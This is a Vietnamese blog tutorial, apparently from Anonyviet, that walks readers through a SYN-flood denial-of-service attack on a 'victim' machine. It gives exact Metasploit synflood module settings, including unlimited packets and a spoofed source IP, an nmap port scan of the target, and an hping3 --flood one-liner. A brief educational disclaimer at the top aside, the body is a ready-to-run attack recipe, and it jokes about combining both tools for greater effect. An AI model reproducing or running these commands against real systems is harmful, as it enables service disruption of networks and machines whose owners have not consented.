Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3

byadmin -
0

Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục vui lòng không thực hiện những hành động bất hợp pháp và Anonyviet sẽ không chịu trách nhiệm mọi bất cứ hành vi phạm pháp nào của các bạn

Trong bài viết này, mình sẽ hướng dẫn cho các bạn cách tấn công DoS hoặc DDoS với công cụ Metasploit và Hping3 nhé. Những cách thức thực hiện khá là đơn giản và nhanh gọn, chỉ chưa đầy 3 phút bạn cũng đã có thể tạo ra một cuộc tấn công khá mạnh mẽ với số lượng Packets được gửi đi rất nhanh khiến cho máy của nạn nhân dẫn đến tình trạng tăng CPU đột ngột, mạng bị chập chờn hoặc bị nặng hơn là treo máy. Vì vậy mình khuyên các bạn nên test với số lượng packets vừa đủ là ok rồi. Còn bây giờ mình sẽ giới thiệu sơ qua về Metasploit và Hping3.

Metasploit 

Là một công cụ có tên gọi đầy đủ là Metasploit Framework đây là công cụ khai thác các lỗ hổng bảo mật được sử dụng nhiều nhất trên thế giới. Không những thế, còn giúp cho các nhà bảo mật thử nghiệm các cuộc thâm nhập và xác minh các lỗ hổng bảo mật sau đó họ sẽ đánh giá về lỗ hổng và nâng cao nhận thức về bảo mật. Metasploit được viết ngôn ngữ Ruby và nhiều ngôn ngữ khác như: Python, C,… để tạo ra các cuộc khai thác và tấn công trên nhiều loại hệ thống khác nhau như: Windows, Linux, WordPress,…vv. Như vậy, mình đã giới thiệu qua xong về Metasploit rùi. Ngoài ra, bạn cũng có thể dụng Metasploit để tấn công mạng, hack Windows từ xa, hoặc đột nhập máy tính trong các bài viết của Anonyviet nhé ^^.

Xem tất cả bài viết về cách sử dụng Metasploit để tấn công kiểm thử hệ thống.

Hping3

Là một công cụ mạng có thể gửi các gói ICMP/UDP/TCP (tùy bạn chỉnh nha) và hiển thị các câu trả lời đích giống như Ping thực hiện với các câu trả lời ICMP. Ngoài ra, nó còn xử lý phân mảnh và kích thước và nội dung gói tùy ý, có thể được sử dụng để truyền tệp theo các giao thức được hỗ trợ. Việc sử dụng Hping3, bạn có thể kiểm tra các tường lửa, thực hiện quét các cổng giả mạo, kiểm tra hiệu suất mạng bằng nhiều thức khác nhau, và thực hiện các hành động giống như theo dõi trong các giao thức khác. Hping3 được viết ngôn ngữ Tcl

Tìm hiểu rõ hơn về Hping3 tại đây

Để hiểu về tấn công DoS hoặc DDoS bạn có thể đọc bài viết đó tại đây. Không luyên thuyên nữa vào vấn đề luôn nào ^^

Cách tạo ra một cuộc tấn công DoS đơn giản bằng Metasploit và Hping3

Metasploit và Hping3 là công được giới thiệu trong chương trình CEH

Tấn công DoS với Metasploit

Ở bài viết này, mình sẽ chỉ cho các bạn cách tấn công DoS bằng phương pháp SYN Flood nhé. Còn ai chưa hiểu rõ cách tấn công này có thể tìm hiểu ở đây Để thực hiện cuộc tấn công trước tiên hãy mở Terminal lên và nhập lệnh msfconsole

Dos with Metasploit

Tiếp theo chúng ta nhập dòng lệnh use auxiliary/dos/tcp/synflood trên thanh Terminal của Metasploit

SYN FLOOD

Tiếp đến, bạn nhập show options để hiện thị các phần cài đặt tùy chỉnh

Options DOS

Ở đây, chúng ta chú ý đến phần:

  • NUM: số lượng Packet cần gửi
  • RHOSTS: Địa chỉ IP máy tính của nạn nhân
  • RPORT: Cổng đang hoạt động trên máy tính của nạn nhân
  • SHOST: Địa chỉ IP bất kì mà bạn muốn đặt. Ví dụ địa chỉ IP bất kì mình muốn đặt là: 172.0.0.1
  • SPORT: Cổng bất kì ( Phần này không cần cũng được )
  • TIMEOUT: Thời gian chờ

Bước tiếp đến là chúng ta sẽ tiến hành cài đặt cuộc tấn công này

Setting Dos

  • set RHOSTS <ip máy tính nạn nhân>
  • set RPORT <cổng máy tính nạn nhân đang hoạt động>
  • set NUM <số lượng Packets cần gửi>
  • set SHOST <ip giả mạo>
  • set TIMEOUT <thời gian chờ>

Tại đây mình đã cài đặt cho cuộc tấn công như sau

  • set rhosts 192.168.0.112
  • set rport 80
  • set num 0
  • set shost 172.0.0.1
  • set timeout 10000

Để bắt đầu cuộc tấn công chúng ta chỉ cần nhập exploitrồi nhấn Enter để bắt đầu tấn công

Bạn nào không biết cổng nào đang hoạt động trên máy tính nạn nhân chúng ta sẽ sử dụng Nmap để quét cổng nhé.

nmap -p <cổng cần quét> <ip máy tính nạn nhân>hoặc nmap -sV <ip nạn nhân>

Ví dụ: nmap -p 443 192.168.0.112 hoặc namp -sV 192.168.0.112

Sau đây là kết quả của cuộc tấn công

kết quả tấn công dos

Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 4

Chúng ta có thể sử dụng công cụ Wireshark để bắt các Packets đang gửi. Giờ đến phần tiếp theo nào ^.^

Tấn công DoS với Hping3

Cách thức thực hiện khá là nhanh và đơn giản. Chỉ với một câu lệnh ngắn bạn đã tạo ra một cuộc tấn công khá mạnh mẽ rồi.

Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 5

Câu lệnh sẽ như sau: hping3 <ip máy nạn nhân> --flood và sau đây là kết quả nè

bat goi tin

Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 6

Uầy, Nếu như mà chúng ta kết hợp cả Metasploit và hping3 tấn công vào một máy thì không biết kết quả sẽ như thế nào nhỉ ?

Vậy là mình đã chỉ dẫn xong rồi nhé. Còn bây giờ xin chào và tạm biệt các bạn. Chúc các bạn có một lành tốt lành và làm việc học tập hiệu quả !

Bạn có thể đọc thêm bài viết Cách viết Tools DDoS đơn giản bằng Python 

Previous Post Next Post